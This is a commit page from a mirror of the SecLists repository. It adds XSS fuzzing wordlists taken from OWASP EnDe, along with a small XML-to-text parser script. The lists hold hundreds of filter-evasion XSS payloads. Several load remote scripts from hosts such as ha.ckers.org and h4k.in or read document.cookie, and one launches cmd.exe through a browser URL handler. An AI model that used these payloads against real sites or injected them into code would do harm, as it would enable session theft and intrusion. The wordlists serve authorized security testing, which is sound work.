mirror of
https://github.com/danielmiessler/SecLists.git
synced 2024-09-11 10:55:33 +03:00
Merge pull request #968 from molangning/patch-xss-wordlists
Patch xss wordlists https://github.com/OWASP/EnDe https://twitter.com/brutelogic/status/1749818762344427614
This commit is contained in:
g0tmi1k
GitHub
commit
debe0cd88d
@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse-
|
||||
`os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url.
|
||||
|
||||
By default this script outputs the results in `Fuzzing/os-names-mutated.txt`
|
||||
|
||||
- - -
|
||||
|
||||
`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique.
|
||||
41
.bin/xml-parser.py
Executable file
41
.bin/xml-parser.py
Executable file
@ -0,0 +1,41 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
import os
|
||||
import sys
|
||||
import xml.etree.ElementTree as et
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
exit(0)
|
||||
|
||||
files=sys.argv[1].split(" ")
|
||||
|
||||
for i in files:
|
||||
if not os.path.isfile(i):
|
||||
print("[!] %s does not exist!"%(i))
|
||||
exit(2)
|
||||
|
||||
for i in files:
|
||||
xml_file = et.parse(i)
|
||||
|
||||
contents = []
|
||||
|
||||
for j in xml_file.getroot().findall("attack"):
|
||||
xss = j.find('code').text
|
||||
|
||||
if not xss:
|
||||
continue
|
||||
|
||||
if "\n" in xss:
|
||||
print("Xss have newline in it.")
|
||||
print(xss, "\n")
|
||||
|
||||
contents.append(xss)
|
||||
|
||||
file_dir, file_name = i.rsplit("/", 1)
|
||||
file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt")
|
||||
|
||||
open(file_name, "w").write("\n".join(contents))
|
||||
|
||||
print(f"Wrote to {file_name}")
|
||||
|
||||
|
||||
@ -111,3 +111,4 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||
<form onsubmit=alert(1)><input type=submit>
|
||||
<select onchange=alert(1)><option>1<option>2
|
||||
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
||||
<Img Src=javascript:alert(1) OnError=location=src>
|
||||
|
Before Width: | Height: | Size: 4.0 KiB After Width: | Height: | Size: 4.1 KiB |
@ -10,4 +10,66 @@ Some XSS trigger condition may require you to interact with the web pages to tri
|
||||
|
||||
To see the results, look out for message popups or network activity in the devtools of your browser.
|
||||
|
||||
Happy hacking!
|
||||
Happy hacking!
|
||||
|
||||
## Removed xss
|
||||
|
||||
### XSS-EnDe-h4k.txt
|
||||
|
||||
Removed because there was no way to squash it into one line
|
||||
|
||||
```
|
||||
_
|
||||
=
|
||||
eval
|
||||
b=1
|
||||
__
|
||||
=
|
||||
location
|
||||
c=1
|
||||
_
|
||||
(
|
||||
__
|
||||
.
|
||||
hash
|
||||
//
|
||||
.
|
||||
substr
|
||||
(1)
|
||||
)
|
||||
```
|
||||
### XSS-EnDe-xssAttacks.txt
|
||||
|
||||
Also removed due to it's multiline nature
|
||||
|
||||
```
|
||||
<IMG
|
||||
SRC
|
||||
=
|
||||
"
|
||||
j
|
||||
a
|
||||
v
|
||||
a
|
||||
s
|
||||
c
|
||||
r
|
||||
i
|
||||
p
|
||||
t
|
||||
:
|
||||
a
|
||||
l
|
||||
e
|
||||
r
|
||||
t
|
||||
(
|
||||
'
|
||||
X
|
||||
S
|
||||
S
|
||||
'
|
||||
)
|
||||
"
|
||||
>
|
||||
```
|
||||
|
||||
@ -110,4 +110,5 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||
<keygen autofocus onfocus=alert(1)>
|
||||
<form onsubmit=alert(1)><input type=submit>
|
||||
<select onchange=alert(1)><option>1<option>2
|
||||
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
||||
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
||||
<Img Src=javascript:alert(1) OnError=location=src>
|
||||
|
Before Width: | Height: | Size: 4.0 KiB After Width: | Height: | Size: 4.1 KiB |
164
Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt
Normal file
164
Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt
Normal file
@ -0,0 +1,164 @@
|
||||
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
|
||||
"'><script>alert('XSS')</script>
|
||||
"'><script>alert(/XSS/)</script>
|
||||
"'><script>alert(42)</script>
|
||||
"'><script>prompt(42)</script>
|
||||
"'><script>confirm(42)</script>
|
||||
"'><sCriPt>confirm(42)</sCriPt>
|
||||
"'><script >confirm(42)</script >
|
||||
"'><script foo=bar>confirm(42)</script>
|
||||
"'><\script>confirm(42)</script>
|
||||
"'><sc\ript>confirm(42)</script>
|
||||
"'><sc\tript>confirm(42)</script>
|
||||
"'><script onlyOpera:-)>alert(42)
|
||||
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
|
||||
"'><script x:href='//evil.com/onlyOpera'>
|
||||
"'><///script///>alert(42)</script>
|
||||
"'><///style///>alert(42)</script>
|
||||
"'><;(24)trela=daolno ;''=e>'=d
|
||||
"'><;(24)trela=daolno ;''=/e>'=d
|
||||
"'><isindex action="javas	cript:alert(42)" type=image>
|
||||
"'><sc ript>confirm(42)</script>
|
||||
"'%3e%3cscript%3econfirm(42)%3c/script%3e
|
||||
"'%253e%253cscript%253econfirm(42)%253c/script%253e
|
||||
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
||||
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
||||
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
||||
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
||||
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
|
||||
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
||||
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
||||
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
|
||||
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
||||
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
|
||||
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
||||
"'><script>\u0061lert(42)</script>
|
||||
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
|
||||
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
||||
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
||||
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
||||
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
||||
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
||||
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
||||
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
||||
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
||||
javascript:alert(42)
|
||||
javascript:prompt(42)
|
||||
javascript:confirm(42)
|
||||
jAvasCript:confirm(42)
|
||||
jAvas\Cript:confirm(42)
|
||||
jAvas Cript:confirm(42)
|
||||
jAvas/* */Cript:confirm(42)
|
||||
javascript:alert(42)
|
||||
document
|
||||
document.
|
||||
top
|
||||
top.
|
||||
top[
|
||||
eval
|
||||
eval(
|
||||
cookie
|
||||
.cookie
|
||||
onerror
|
||||
onerror=
|
||||
onclick
|
||||
onclick=
|
||||
onmouseover
|
||||
onmouseover=
|
||||
onload
|
||||
onload=
|
||||
"onerror
|
||||
"onerror=
|
||||
"onclick
|
||||
"onclick=
|
||||
"onmouseover
|
||||
"onmouseover=
|
||||
"onload
|
||||
"onload=
|
||||
href=
|
||||
src=
|
||||
link=
|
||||
style=
|
||||
alt=
|
||||
title=
|
||||
egal=
|
||||
"href=
|
||||
"src=
|
||||
"link=
|
||||
"style=
|
||||
"alt=
|
||||
"title=
|
||||
"egal=
|
||||
<a
|
||||
<a href=
|
||||
<a alt=42 href=
|
||||
<a href="javascript:
|
||||
<a href=" javascript:
|
||||
<p
|
||||
<div
|
||||
<iframe
|
||||
<index
|
||||
<layer
|
||||
<link
|
||||
<meta
|
||||
<style
|
||||
<script
|
||||
<img src="/" =_=" title="onerror='alert(42)'">
|
||||
<img src ?notinChrome?\/onerror = alert(42)
|
||||
<img src ?notinChrome?\/onerror=alert(42)
|
||||
<img/alt="/"src="/"onerror=alert(42)>
|
||||
<iframe/src \/\/onload = alert(42)
|
||||
<iframe/onreadystatechange=alert(42)
|
||||
<!-- open comment
|
||||
<!-- complete comment -->
|
||||
--><!-- close/complete comment -->
|
||||
<![CDATA[
|
||||
<![CDATA[ open cdata
|
||||
<![CDATA[ complete cdata ]]>
|
||||
]]><![CDATA[ close/complete cdata ]]>
|
||||
<?xml
|
||||
<?xml version="1.0">
|
||||
" value=``
|
||||
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
|
||||
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
||||
<div style="{ left:expression( alert('XSS') ) }">
|
||||
left:expr/**/ession(alert('XSS'))
|
||||
left:expr/* */ession(alert('XSS'))
|
||||
left:e\0078pr\0065ssion(alert('XSS'))
|
||||
left:\0065\0078pr\0065ssion(alert('XSS'))
|
||||
left:expr\65ssion(alert('XSS') ))
|
||||
left:expr\0065ssion(alert('XSS'))
|
||||
left:expression(alert('XSS'))
|
||||
left:expression(alert('XSS'))
|
||||
left:expression(alert('XSS'))
|
||||
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
|
||||
left:expression(alert('XSS'))
|
||||
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
||||
left:expression(alert('XSS'))
|
||||
left:EXPR/**/ESSION(alert('XSS'))
|
||||
left:EXPR/* */ESSION(alert('XSS'))
|
||||
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
|
||||
left:EXPRbsSION(alert('XSS'))
|
||||
left:EXPRESSION(alert('XSS'))
|
||||
left:exp\0280essio\0274(alert('XSS'))
|
||||
left:exp\0280essio\207f(alert('XSS'))
|
||||
left:expʀessioɴ(alert('XSS'))
|
||||
left:expʀessioⁿ(alert('XSS'))
|
||||
%u00ABscript%u00BB
|
||||
〈script〉
|
||||
U%2bFF1CscriptU%2bFF1E
|
||||
‹script›
|
||||
〈script〉
|
||||
⟨script⟩
|
||||
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
|
||||
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
|
||||
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
|
||||
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
|
||||
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
|
||||
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
|
||||
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
|
||||
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
|
||||
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
|
||||
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
||||
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
||||
<%<!--'%><script>alert(42);</script -->
|
||||
206
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.txt
Normal file
206
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.txt
Normal file
@ -0,0 +1,206 @@
|
||||
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
|
||||
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
|
||||
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
||||
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>
|
||||
<div style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
||||
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
|
||||
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
`> <script>alert(5)</script>
|
||||
> <script>alert(4)</script>
|
||||
xyz onerror=alert(6);
|
||||
1;a=eval;b=alert;a(b(/c/.source));
|
||||
1];a=eval;b=alert;a(b(17));//
|
||||
];a=eval;b=alert;a(b(16));//
|
||||
'];a=eval;b=alert;a(b(15));//
|
||||
1};a=eval;b=alert;a(b(14));//
|
||||
'};a=eval;b=alert;a(b(13));//
|
||||
};a=eval;b=alert;a(b(12));//
|
||||
a=1;a=eval;b=alert;a(b(11));//
|
||||
;//%0da=eval;b=alert;a(b(10));//
|
||||
';//%0da=eval;b=alert;a(b(9));//
|
||||
'> <script>alert(3)</script>
|
||||
</title><script>alert(1)</script>
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS');">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<!--<A href="- --><a href=javascript:alert:document.domain>test-->
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
|
||||
<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script>
|
||||
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
||||
*/a=eval;b=alert;a(b(/e/.source));/*
|
||||
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
|
||||
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
||||
<A HREF="http://1113982867/">XSS</A>
|
||||
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||
\";alert('XSS');//
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
eval(name)
|
||||
<A HREF="http://www.google.com./">XSS</A>
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<A HREF="//google">XSS</A>
|
||||
<A HREF="http://ha.ckers.org@google">XSS</A>
|
||||
<A HREF="http://google:ha.ckers.org">XSS</A>
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
'';!--"<script>alert(0);</script>=&{(alert(1))}
|
||||
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
|
||||
<img src=`x` onrerror= ` ;; alert(1) ` />
|
||||
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
|
||||
style=color: expression(alert(0));" a="
|
||||
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
|
||||
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
|
||||
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
||||
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
|
||||
<IMG DYNSRC="javascript:alert('XSS');">
|
||||
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
||||
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
||||
<IMG LOWSRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<A HREF="http://66.102.7.147/">XSS</A>
|
||||
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
|
||||
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
|
||||
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
||||
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
|
||||
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
|
||||
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
|
||||
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||
%0da=eval;b=alert;a(b(/d/.source));
|
||||
<a href = "javas cript :ale rt(1)">test
|
||||
+alert(0)+
|
||||
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
|
||||
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
|
||||
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||
<IMG SRC="livescript:[code]">
|
||||
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<A HREF="http://6	6.000146.0x7.147/">XSS</A>
|
||||
<IMG SRC="mocha:[code]">
|
||||
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
|
||||
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
|
||||
<IMGSRC="javascript:alert('XSS')">
|
||||
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
|
||||
a=/ev/// .source a+=/al/// .source a[a] (name)
|
||||
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
|
||||
setTimeout//
|
||||
(name// ,0)
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
||||
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
|
||||
</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
|
||||
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
||||
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
||||
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
|
||||
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
|
||||
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
|
||||
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
|
||||
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
|
||||
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
|
||||
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
|
||||
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
|
||||
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
|
||||
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
|
||||
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
||||
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
|
||||
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
|
||||
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
|
||||
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
|
||||
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
|
||||
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
||||
open(name)
|
||||
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||
alert(1)
|
||||
<A HREF="//www.google.com/">XSS</A>
|
||||
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||
0%0d%0a%00<script src=//h4k.in>
|
||||
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<A HREF="http://google.com/">XSS</A>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
<SCRIPT>alert('XSS')</SCRIPT>
|
||||
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
|
||||
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
|
||||
eval.call(this,unescape.call(this,location))
|
||||
